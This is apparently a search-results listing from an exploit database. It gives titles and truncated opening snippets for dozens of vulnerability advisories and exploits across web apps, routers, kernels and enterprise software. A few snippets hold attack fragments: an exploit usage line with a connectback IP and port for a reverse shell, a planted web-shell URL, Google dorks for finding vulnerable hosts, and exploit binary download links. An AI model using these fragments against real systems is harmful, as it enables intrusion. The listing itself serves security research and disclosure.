41207 matches found
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery
IBM Websphere Application Server 7.0.0.13 - Cross-Site Request Forgery -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://corelabs.coresecurity.com/ IBM WebSphere Application Server Cross-Site Request Forgery 1. Advisory Information Title: IBM...
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting
Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - jdeJASMafletMafBrowserClose.mafService?jdemafjasLinkTarget Cross-Site Scripting source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker...
Pandora Fms 3.1 - SQL Injection
Pandora Fms 3.1 - SQL Injection + Introduction Pandora FMS for Pandora Flexible Monitoring System is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications...
HP LaserJet - Directory Traversal in PJL Interface
HP LaserJet - Directory Traversal in PJL Interface n.runs AG http://www.nruns.com/ securityatnruns.com n.runs-SA-2010.003 16-Nov-2010 Vendor: Hewlett-Packard, http://www.hp.com Affected Products: Various HP LaserJet MFP devices See HP advisory 3 for the complete list Vulnerability: Directory...
KDE KDELibs 4.3.3 - Remote Array Overrun
KDE KDELibs 4.3.3 - Remote Array Overrun -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 KDE KDELibs 4.3.3 Remote Array Overrun Arbitrary code execution Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - - Dis.: 07.05.2009 - - Pub.: 20.11.2009 CVE: CVE-2009-0689 Risk: High...
VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal
VMware Server 2.0.1 ESXi Server 3.5 - Directory Traversal source: https://www.securityfocus.com/bid/36842/info VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain...
Active PHP BookMarks 1.1.02 - SQL Injection
Active PHP BookMarks 1.1.02 - SQL Injection Bookmarks V 1.1.02 id Remote SQL Injection Vulnerability Hussin X Author: Hussin X Home : www.tryag.cc/cc email: darkangelg85atYahooDoTcom script :...
Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure
Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure source: https://www.securityfocus.com/bid/27706/info Apache Tomcat is prone to an information-disclosure vulnerability because it fails to adequately sanitize user-supplied data. Attackers can exploit this issue to access...
S9Y Serendipity 0.x - exit.php HTTP Response Splitting
S9Y Serendipity 0.x - exit.php HTTP Response Splitting source: https://www.securityfocus.com/bid/11497/info Serendipity is reported prone to an HTTP response splitting vulnerability. A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or...
SCPOnly 2.32.4 - SSH Environment Shell Escaping
SCPOnly 2.32.4 - SSH Environment Shell Escaping source: https://www.securityfocus.com/bid/5526/info scponly is a freely available, open source restricted secure copy client. It is available for Unix and Linux operating systems. The default installation of scponly does not place sufficient access...
FileSeek CGI Script - Remote Command Execution
FileSeek CGI Script - Remote Command Execution source: https://www.securityfocus.com/bid/6783/info FileSeek is an example cgi-script from "The CGI/Perl Cookbook from John Wiley & Sons". The script is written and maintained by Craig Patchett. It is mainly used to find and download files on a web...
Thrive Smart Home 1.1 - Authentication Bypass
Thrive Smart Home 1.1 - Authentication Bypass Exploit: Thrive Smart Home 1.1 - Authentication Bypass Date: 2019-12-30 Author: LiquidWorm Vendor: Thrive Product web page: http://www.thrivesmarthomes.com Affected version: 1.1 Tested on: Apache/2.4.41 centos OpenSSL/1.0.2k-fips Advisory ID:...
HomeAutomation 3.3.2 - Remote Code Execution
HomeAutomation 3.3.2 - Remote Code Execution Exploit: HomeAutomation 3.3.2 - Remote Code Execution Date: 2019-12-30 Author: LiquidWorm Vendor: Tom Rosenback and Daniel Malmgren Product web page: http://karpero.mine.nu/ha/ Affected version: 3.3.2 Tested on: Apache/2.4.41 centos OpenSSL/1.0.2k-fips...
Xfilesharing 2.5.1 - Arbitrary File Upload
Xfilesharing 2.5.1 - Arbitrary File Upload Exploit Title: Xfilesharing 2.5.1 - Arbitrary File Upload Google Dork: inurl:/?op=registration Date: 2019-11-4 Exploit Author: Noman Riffat Vendor Homepage: https://sibsoft.net/xfilesharing.html Version: Shell : http://xyz.com/cgi-bin/temp/joe/shell.php...
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery
Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Exploit Title: Intelbras Router WRN150 1.0.18 - Cross-Site Request Forgery Date: 2019-10-25 Exploit Author: Prof. Joas Antonio Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://en.intelbras.com.br/node/25896 Version...
IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload
IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload Exploit Title: IBM Bigfix Platform 9.5.9.62 - Arbitrary File Upload Date: 2018-12-11 Exploit Authors: Jakub Palaczynski Vendor Homepage: https://www.ibm.com/ Version: IBM Bigfix Platform Software Add Software" menu. Here user needs to choose...
Western Digital My Book World II NAS 1.02.12 - Authentication Bypass Command Execution
Western Digital My Book World II NAS 1.02.12 - Authentication Bypass Command Execution Exploit Title: Western Digital My Book World II NAS = 1.02.12 - Broken Authentication to RCE Google Dork: intitle:"My Book World Edition - MyBookWorld" Date: 19th Sep, 2019 Exploit Author: Noman Riffat, Nationa...
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting 1CRM On-Premise Software 8.5.7 Stored XSS Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting Date: 19/07/2019 Exploit Author: Kus...
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray
Microsoft DirectWrite AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font...
VMware WorkStation 12.5.3 - Virtual Machine Escape
VMware WorkStation 12.5.3 - Virtual Machine Escape VMware Escape Exploit VMware Escape Exploit before VMware WorkStation 12.5.3 Host Target: Win10 x64 Compiler: VS2013 Test on VMware 12.5.2 build-4638234 Known issues Failing to heap manipulation causes host process crash. About 50% successful rat...
AjentiCP 1.2.23.13 - Cross-Site Scripting
AjentiCP 1.2.23.13 - Cross-Site Scripting Title: AjentiCP 1.2.23.13 - Cross-Site Scripting Author: Numan OZDEMIR https://infinitumit.com.tr Vendor Homepage: ajenti.org Software Link: https://github.com/ajenti/ajenti Version: Up to v1.2.23.13 CVE: CVE-2018-18548 Description: Attacker can inject...
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution
Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution !/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.p...
Schneider Electric PLCs - Cross-Site Request Forgery
Schneider Electric PLCs - Cross-Site Request Forgery Exploit Title: Schneider Electric PLCs - Cross-Site Request Forgery Date: 2018-05-12 Exploit Author: t4rkd3vilz Vendor Homepage: http://www.schneider-electric.com/ Tested on: Windows CVE: CVE-2013-0663 Version: Schneider Electric Quantum PLC:...
libmad 0.15.1b - mp3 Memory Corruption
libmad 0.15.1b - mp3 Memory Corruption libmad memory corruption vulnerability ================ Author : qflb.wu =============== Introduction: ============= libmad is a high-quality MPEG audio decoder capable of 24-bit output. Affected version: ===== 0.15.1b Vulnerability Description:...
Oracle PeopleSoft - PeopleSoftServiceListeningConnector XML External Entity via DOCTYPE
Oracle PeopleSoft - PeopleSoftServiceListeningConnector XML External Entity via DOCTYPE Application: Oracle PeopleSoft Versions Affected: PeopleSoft HCM 9.2 on PeopleTools 8.55 Vendor URL: http://oracle.com Bug: XXE Reported: 23.12.2016 Vendor response: 24.12.2016 Date of Public Advisory:...
Miele Professional PG 8528 - Directory Traversal
Miele Professional PG 8528 - Directory Traversal Title: ====== Miele Professional PG 8528 - Web Server Directory Traversal Author: ======= Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG CVE-ID: ======= CVE-2017-7240 Risk Information: ================= Risk Factor: Medium CVSS Base Score:...
Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - set_dp_control_port Lack of Locking Use-After-Free
Apple macOS 10.12 16A323 XNU Kernel iOS 10.1.1 - set_dp_control_port Lack of Locking Use-After-Free Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=965 set_dp_control_port is a MIG method on the host_priv_port so this bug is a root-kernel escalation. kern_return_t set_dp_control_port hostpri...
SweetRice 1.5.1 - Arbitrary File Upload
SweetRice 1.5.1 - Arbitrary File Upload /usr/bin/python -- Coding: utf-8 -- Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload Exploit Author: Ashiyane Digital Security Team Date: 03-11-2016 Vendor: http://www.basic-cms.org/ Software Link:...
Gallery 2 2.0.2 - Multiple Vulnerabilities
Gallery 2 2.0.2 - Multiple Vulnerabilities Gallery 2 Multiple Vulnerabilities Vendor: Bharat Mediratta Product: Gallery 2 Version: = 2.0.2 Website: http://gallery.menalto.com/ BID: 16940 CVE: CVE-2006-1127 CVE-2006-1128 OSVDB: 23596 23597 SECUNIA: 19104 PACKETSTORM: 44358 Description: Gallery2, t...
8 TOTOLINK Router Models - Backdoor Access Remote Code Execution
8 TOTOLINK Router Models - Backdoor Access Remote Code Execution Advisory Information Title: Backdoor and RCE found in 8 TOTOLINK router models Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt Blog URL:...
PHPXMLRPC 1.1 - Remote Code Execution
PHPXMLRPC 1.1 - Remote Code Execution PHPXMLRPC Remote Code Execution Vendor: Useful Information Inc. Product: PHPXMLRPC Version: = 1.1 Website: http://phpxmlrpc.sourceforge.net/ BID: 14088 CVE: CVE-2005-1921 OSVDB: 17793 SECUNIA: 15852 PACKETSTORM: 38394 Description: PHPXMLRPC aka XML-RPC For PH...
Apple Mac OSX - Local Denial of Service
Apple Mac OSX - Local Denial of Service / 2015, Maxime Villard, CVE-2015-1100 Local DoS caused by a missing limit check in the fat loader of the Mac OS X Kernel. $ gcc -o Mac-OS-XFat-DoS Mac-OS-XFat-DoS.c $ ./Mac-OS-XFat-DoS BINARY-NAME Obtained from: http://m00nbsd.net/garbage/Mac-OS-XFat-DoS.c...
NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities
NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP...
Microsoft Windows - OLE Package Manager SandWorm
Microsoft Windows - OLE Package Manager SandWorm !/usr/bin/env python import os import zipfile import sys ''' Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35019.tar.gz Very quick and ugly SandWorm CVE-2014-4114 exploit builder Exploit Title:...
osCommerce 2.3.4 - Multiple Vulnerabilities
osCommerce 2.3.4 - Multiple Vulnerabilities Title: osCommerce 2.3.4 - Multiple vulnerabilities Date: 10.07.14 Affected versions: = 2.3.4 latest atm Vendor: oscommerce.com Tested on: Apache 2.2.22 at Debian Contact: smash at devilteam.pl Cross Site Scripting 1. Reflected XSS - Send Email Vulnerabl...
Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities
Exponent CMS 2.2.0 Beta 3 - Multiple Vulnerabilities Advisory ID: HTB23154 Product: Exponent CMS Vendor: Online Innovative Creations Vulnerable Versions: 2.2.0 beta 3 and probably prior Tested Version: 2.2.0 beta 3 Vendor Notification: April 24, 2013 Vendor Patch: May 3, 2013 Public Disclosure: M...
XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities
XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities Advisory ID: HTB23062 Product: XOOPS Vendor: xoops.org Vulnerable Versions: 2.5.4 and probably prior Tested Version: 2.5.4 Vendor Notification: 7 December 2011 Vendor Patch: 22 February 2012 Public Disclosure: 18 April 2012 Vulnerability...
IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting
IBM Websphere ILOG JRules 6.7 - Cross-Site Scripting source: https://www.securityfocus.com/bid/41030/info IBM WebSphere ILOG JRules is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary...
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow
Microsoft Windows Outlook Express and Windows Mail - Integer Overflow Application: Microsoft Outlook Express Microsoft Windows Mail Platforms: Windows 2000 Windows XP Windows Vista Windows server 2003 Windows Server 2008 SR2 Exploitation: Remote Exploitable CVE Number: CVE-2010-0816 Discover Date...
HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code
HP OpenView Network Node Manager OV NNM 7.53 - Invalid DB Error Code -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ HP Openview NNM 7.53 Invalid DB Error Code vulnerability 1. Advisory Information Title: HP Openvi...
Pligg 9.9.5b - Arbitrary File Upload SQL Injection
Pligg 9.9.5b - Arbitrary File Upload SQL Injection #!/usr/bin/perl =about Pligg 9.9.5 Beta Perl exploit AUTHOR discovered & written by Ams ax330d doggy gmail dot com VULN. DESCRIPTION: Vulnerability hides in 'evb/checkurl.php' unfiltered $_GET['url'] parameter. Actually, it has filtration. Filtration...
Arab Portal 2.1 (Windows) - Remote File Disclosure
Arab Portal 2.1 Windows - Remote File Disclosure Arab Portal v2.1 Remote File Disclosure Win32 AUTHOR : IRCRASH R3d.W0rm Sina Yazdanmehr Discovered by : R3d.W0rm Sina Yazdanmehr Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download :...
phpBB Fishing Cat Portal Addon - functions_portal.php Remote File Inclusion
phpBB Fishing Cat Portal Addon - functions_portal.php Remote File Inclusion source: https://www.securityfocus.com/bid/28708/info Fishing Cat Portal Addon for phpBB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue ca...
XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow
XMPlay 3.3.0.4 - .ASX Filename Local Buffer Overflow 0-day XMPlay 3.3.0.4 .ASX Filename Buffer Overflow Exploit XMPlay 3.3.0.4 and lower experience a stack-bas...
BrudaGB 1.1 - adminindex.php Remote File Inclusion
BrudaGB 1.1 - adminindex.php Remote File Inclusion BrudaGB Exploit : ...
Linux Kernel 2.6.x - IPv6 Local Denial of Service
Linux Kernel 2.6.x - IPv6 Local Denial of Service / source: https://www.securityfocus.com/bid/15156/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from an infinite loop when binding IPv6 UDP ports. / / Linux kernel IPv6 UDP port selection infinit...
PANDORAFMS 7.0 - Authenticated Remote Code Execution
PANDORAFMS 7.0 - Authenticated Remote Code Execution Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution Date: 2020-02-12 Exploit Author: Engin Demirbilek Vendor homepage: http://pandorafms.org/ Version: 7.0 Software link:...
Remote Desktop Gateway - BlueGate Denial of Service (PoC)
Remote Desktop Gateway - BlueGate Denial of Service PoC include "BlueGate.h" / EDB Note: - Download Binary https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47964-1.exe - Download Source...
Windows - Shell COM Server Registrar Local Privilege Escalation
Windows - Shell COM Server Registrar Local Privilege Escalation // Axel '0vercl0k' Souchet - December 28 2019 // References: // - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun // -...
Technicolor TD5130.2 - Remote Command Execution
Technicolor TD5130.2 - Remote Command Execution Exploit Title: Technicolor TD5130.2 - Remote Command Execution Date: 2019-11-12 Exploit Author: João Teles Vendor Homepage: https://www.technicolor.com/ Version: TD5130v2 Firmware Version: OIFwV20 CVE : CVE-2019-18396 --------------------------- POS...